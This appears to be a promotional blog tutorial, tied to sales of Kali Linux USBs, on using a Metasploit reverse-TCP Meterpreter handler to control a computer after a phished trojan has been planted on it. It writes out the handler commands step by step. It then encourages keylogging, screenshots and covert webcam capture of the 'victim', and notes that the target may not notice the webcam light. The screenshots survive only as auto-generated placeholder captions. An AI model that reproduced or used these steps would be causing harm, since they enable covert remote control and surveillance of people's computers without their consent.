How to use Meterpreter when controlling a Trojan Leave a comment

Note: If you do not have Kali Linux, you can buy a pre-made ready to boot USB with Kali Linux on it from our shop or you can buy Kali Linux on Amazon.

A quick preview of what’s to come:

Step 1: Start a meterpreter session

Open meterpreter from the applications menu and run it.

You should then see a menu open that looks something like this.

A screenshot of a cell phone  Description automatically generated

Type in:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp

If you forgot how to find your ip address from the previous article, simply type in ifconfig on a new terminal.

A screenshot of a cell phone  Description automatically generated
set lhost [your IP address]
set lport 4444
A screenshot of a cell phone  Description automatically generated

After all of this is done, type “run” and the session will start. The session will continue to wait until the trojan file is executed.

A screenshot of a cell phone  Description automatically generated

Step 2: Wait for the phish

You will stay on this screen until the target runs the file, and once they do, your screen will change to this:

A screenshot of a cell phone  Description automatically generated

From here, you can type in “help” to see a list of commands.

A screenshot of a cell phone  Description automatically generated
A screenshot of a cell phone  Description automatically generated
A screenshot of a cell phone  Description automatically generated
A screenshot of a cell phone  Description automatically generated

There are a ton of attractive commands. You can log the target’s key inputs, take screenshots, snap pictures from their webcam, and so much more. Feel free to explore to your heart’s content.

Example: Type: webcam_snap to take a picture through the target computer’s webcam.

A screenshot of a cell phone  Description automatically generated

Note: the computer’s webcam light will turn on. For a simple picture, this might not be too big a deal, as it will only be for a second and the target might not notice, but it should be noted.

A picture of whatever the webcam sees will be sent to your machine.

A close up of a sign  Description automatically generated

To exit the meterpreter session, simply type “exit” to end the session.

A screenshot of a cell phone  Description automatically generated

This is only one of the many amazing things you can do with meterpreter and Metasploit in general. If you want to continue playing around, you can buy a USB with Kali Linux at this website here.

In conclusion:

  • We started a meterpreter session and waited for the victim to run the trojan that we have already planted on his computer.
  • Once the victim ran the trojan, we used meterpreter to look around on the victim’s computer and take a webcam screenshot.

Metasploit is a powerful and very fun tool to use once you get the hang of it. You can do so many more things with metasploit besides taking a screenshot, and if you want to play around with metasploit by yourself, you can buy a Kali Linux live USB right here.

Leave a Reply

Your email address will not be published.